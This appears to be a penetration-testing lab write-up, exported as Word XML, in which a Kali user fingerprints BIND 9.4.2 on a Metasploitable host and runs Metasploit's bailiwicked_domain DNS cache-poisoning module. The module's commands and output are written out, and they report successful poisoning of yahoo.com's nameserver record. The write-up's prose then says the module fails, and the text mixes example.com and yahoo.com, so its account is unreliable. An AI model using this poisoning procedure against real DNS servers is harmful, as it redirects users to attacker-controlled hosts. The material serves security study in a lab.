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53/tcp   open  domain      ISC BIND 9.4.2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| dns-nsid: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|_  bind.version: 9.4.2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┌──(root💀kali)-[~]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└─# nmap --script="dns-nsid" 192.168.1.36 -p 53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Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-25 10:30 EDT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Nmap scan report for metasploitable.localdomain (192.168.1.36)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Host is up (0.00043s latency).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PORT   STATE SERVICE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53/tcp open  domain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| dns-nsid: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|_  bind.version: 9.4.2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MAC Address: 00:0C:29:FA:DD:2A (VMware)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Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds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                                          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┌──(root💀kali)-[~]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└─# dig version.bind CHAOS TXT @192.168.1.36                                                 10 ⨯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 &lt;&lt;&gt;&gt; DiG 9.16.15-Debian &lt;&lt;&gt;&gt; version.bind CHAOS TXT @192.168.1.36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global options: +cmd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Got answer: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-&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 9835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flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1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WARNING: recursion requested but not available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OPT PSEUDOSECTION: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 EDNS: version: 0, flags:; udp: 4096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QUESTION SECTION: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;version.bind.                  CH      TXT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ANSWER SECTION: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version.bind.           0       CH      TXT     "9.4.2"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AUTHORITY SECTION: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version.bind.           0       CH      NS      version.bind.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Query time: 0 msec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SERVER: 192.168.1.36#53(192.168.1.36)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WHEN: Sat Jun 25 10:31:30 EDT 2022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MSG SIZE  rcvd: 73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                                                                                 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                                                                                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┌──(root💀kali)-[~]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└─# dig ANY @192.168.1.36                                                                   255 ⨯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 &lt;&lt;&gt;&gt; DiG 9.16.15-Debian &lt;&lt;&gt;&gt; ANY @192.168.1.36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 (1 server found)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global options: +cmd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Got answer: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-&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 60129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flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 27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OPT PSEUDOSECTION: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 EDNS: version: 0, flags:; udp: 4096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QUESTION SECTION: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;.                              IN      NS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ANSWER SECTION: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.                       518239  IN      NS      j.root-servers.net.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.                       518239  IN      NS      f.root-servers.net.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.                       518239  IN      NS      b.root-servers.net.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.                       518239  IN      NS      e.root-servers.net.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.                       518239  IN      NS      d.root-servers.net.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.                       518239  IN      NS      k.root-servers.net.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.                       518239  IN      NS      g.root-servers.net.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.                       518239  IN      NS      m.root-servers.net.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.                       518239  IN      NS      l.root-servers.net.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.                       518239  IN      NS      a.root-servers.net.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.                       518239  IN      NS      h.root-servers.net.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.                       518239  IN      NS      c.root-servers.net.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.                       518239  IN      NS      i.root-servers.net.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ADDITIONAL SECTION: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i.root-servers.net.     518239  IN      A       192.36.148.17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i.root-servers.net.     518239  IN      AAAA    2001:7fe::53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k.root-servers.net.     518239  IN      A       193.0.14.129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k.root-servers.net.     518239  IN      AAAA    2001:7fd::1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e.root-servers.net.     518239  IN      A       192.203.230.10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e.root-servers.net.     518239  IN      AAAA    2001:500:a8::e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m.root-servers.net.     518239  IN      A       202.12.27.33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m.root-servers.net.     518239  IN      AAAA    2001:dc3::35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h.root-servers.net.     518239  IN      A       198.97.190.53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h.root-servers.net.     518239  IN      AAAA    2001:500:1::53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g.root-servers.net.     518239  IN      A       192.112.36.4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g.root-servers.net.     518239  IN      AAAA    2001:500:12::d0d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f.root-servers.net.     518239  IN      A       192.5.5.241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f.root-servers.net.     518239  IN      AAAA    2001:500:2f::f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b.root-servers.net.     518239  IN      A       199.9.14.201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b.root-servers.net.     518239  IN      AAAA    2001:500:200::b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d.root-servers.net.     518239  IN      A       199.7.91.13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d.root-servers.net.     518239  IN      AAAA    2001:500:2d::d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c.root-servers.net.     518239  IN      A       192.33.4.12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c.root-servers.net.     518239  IN      AAAA    2001:500:2::c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j.root-servers.net.     518239  IN      A       192.58.128.30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j.root-servers.net.     518239  IN      AAAA    2001:503:c27::2:30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a.root-servers.net.     518239  IN      A       198.41.0.4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a.root-servers.net.     518239  IN      AAAA    2001:503:ba3e::2:30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l.root-servers.net.     518239  IN      A       199.7.83.42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l.root-servers.net.     518239  IN      AAAA    2001:500:9f::42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Query time: 0 msec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SERVER: 192.168.1.36#53(192.168.1.36)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WHEN: Sat Jun 25 10:34:47 EDT 2022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;; MSG SIZE  rcvd: 811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                                      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BIND 9.4.1 &lt; 9.4.2  DNS Cache Poisoning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This exploit targets a fairly ubiquitous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vulnerability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in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DNS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implementations, allowing it to inject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malicious DNS records into the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targeted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name server's cache. The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exploit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saves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a single malicious nameserver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record on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the target nameserver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and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replaces the legitimate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nameserver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for the target domain. By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forcing a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target nameserver to query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a random host name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for the target domain,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an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attacker can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forge responses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to the target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server, including responses to queries, authoritative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server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records,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and additional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records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for that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server. increase. The culprit Target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nameserver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inserts an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additional record into the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cache. This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insert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completely replaces the original nameserver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record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for the target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domain.</w:t>
      </w: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. [CVE: 2008-4194 2008-1447]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 &gt; use auxiliary/spoof/dns/bailiwicked_domain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 auxiliary(bailiwicked_domain) &gt; set RHOST 192.168.1.36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RHOST =&gt; 192.168.1.36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 auxiliary(bailiwicked_domain) &gt; set DOMAIN yahoo.com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DOMAIN =&gt; yahoo.com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 auxiliary(bailiwicked_domain) &gt; set NEWDNS dns01.metasploit.com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NEWDNS =&gt; dns01.metasploit.com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 auxiliary(bailiwicked_domain) &gt; set SRCPORT 0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SRCPORT =&gt; 0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 auxiliary(bailiwicked_domain) &gt; check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Using the Metasploit service to verify exploitability...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 &gt;&gt; ADDRESS: 192.168.1.36  PORT: 50391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 &gt;&gt; ADDRESS: 192.168.1.36  PORT: 50391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 &gt;&gt; ADDRESS: 192.168.1.36  PORT: 50391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 &gt;&gt; ADDRESS: 192.168.1.36  PORT: 50391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 &gt;&gt; ADDRESS: 192.168.1.36  PORT: 50391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FAIL: This server uses static source ports and is vulnerable to poisoning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 auxiliary(bailiwicked_domain) &gt; dig +short -t ns yahoo.com @192.168.1.36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exec: dig +short -t ns yahoo.com @192.168.1.36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b.iana-servers.net.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a.iana-servers.net.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 auxiliary(bailiwicked_domain) &gt; run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Switching to target port 50391 based on Metasploit service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Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com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Querying recon nameserver for example.com.'s nameservers...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 Got an NS record: example.com.            171957  IN      NS      b.iana-servers.net.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  Querying recon nameserver for address of b.iana-servers.net....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   Got an A record: b.iana-servers.net.     171028  IN      A       193.0.0.236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    Checking Authoritativeness: Querying 193.0.0.236 for yahoo.com....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    b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as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 Got an NS record: example.com.            171957  IN      NS      a.iana-servers.net.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  Querying recon nameserver for address of a.iana-servers.net....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   Got an A record: a.iana-servers.net.     171414  IN      A       192.0.34.43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    Checking Authoritativeness: Querying 192.0.34.43 for example.com....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    a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as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Attempting to inject poison records for yahoo.com.'s nameservers into 192.168.1.36:50391...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Sent 1000 queries and 20000 spoofed responses...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Sent 2000 queries and 40000 spoofed responses...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Sent 3000 queries and 60000 spoofed responses...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Sent 4000 queries and 80000 spoofed responses...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Sent 5000 queries and 100000 spoofed responses...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Sent 6000 queries and 120000 spoofed responses...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Sent 7000 queries and 140000 spoofed responses...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Sent 8000 queries and 160000 spoofed responses...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Sent 9000 queries and 180000 spoofed responses...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Sent 10000 queries and 200000 spoofed responses...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Sent 11000 queries and 220000 spoofed responses...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Sent 12000 queries and 240000 spoofed responses...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Sent 13000 queries and 260000 spoofed responses...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Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com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Auxiliary module execution completed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 auxiliary(bailiwicked_domain) &gt; dig +short -t ns yahoo.com @192.168.1.36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exec: dig +short -t ns yahoo.com @192.168.1.36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dns01.metasploit.com.</w:t>
      </w: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asciiTheme="minorAscii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Theme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>BIND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/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The Berkeley Internet Name Domain (BIND) is an implementation of the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Internet's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Domain Name System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(DNS).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It performs both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the primary roles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of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a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DNS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server,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acting as an authoritative name server for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your domain,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and acting as a recursive resolver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on your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network. As of 2015, it is the most widely used domain name server software and the de facto standard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for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Unix-like operating systems.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Searching for exploits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in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ISC BIND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9.4.2 reveals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the following exploit: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https://www.exploit-db.com/exploits/6122/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This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injects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malicious DNS records into DNS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servers. I can do it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/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DNS Exploit: Bailiwicked Domains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This attack allows you to add your own DNS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records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to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the target's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DNS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nameservers. So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you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can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create a DNS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record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like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somethingsehrevil.microsoft.com to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direct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your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visitors wherever you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want.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After setting the options for the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module,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I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should be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able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to test it, but it fails:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:u w:val="none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6619875" cy="1929130"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1270"/>
            <wp:docPr id="53" name="Picture 13" descr="Failed MSF modul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13" descr="Failed MSF module"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:srcRect b="8356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Theme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>And the exploit itself also fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii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Theme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Exploiting DNS: bailiwicked host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asciiTheme="minorAscii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Theme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>This attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries.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Theme="minorAscii"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:u w:val="none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6831965" cy="2157730"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="54" name="Picture 14" descr="Failed MSF modul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14" descr="Failed MSF module"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="10153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/>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440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DiagramTTSmoo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agramTTSmooth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630A9"/>
    <w:rsid w:val="4546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s://drive.google.com/uc?id=1IJpL9AuvwMqcdNUOx1mF0r60yGRzqgl2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rive.google.com/uc?id=1i1F_9l5ZcsCS2siWOb72zOs1aweyoh16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2022-12-26T15:20:00Z</dcterms:created>
  <dc:creator>WPS_1665655857</dc:creator>
  <cp:lastModifiedBy>WPS_1665655857</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-26T15:26:54Z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